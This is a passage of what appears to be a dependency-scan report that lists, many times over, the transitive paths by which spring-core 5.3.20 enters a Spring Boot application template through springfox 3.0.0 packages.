  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
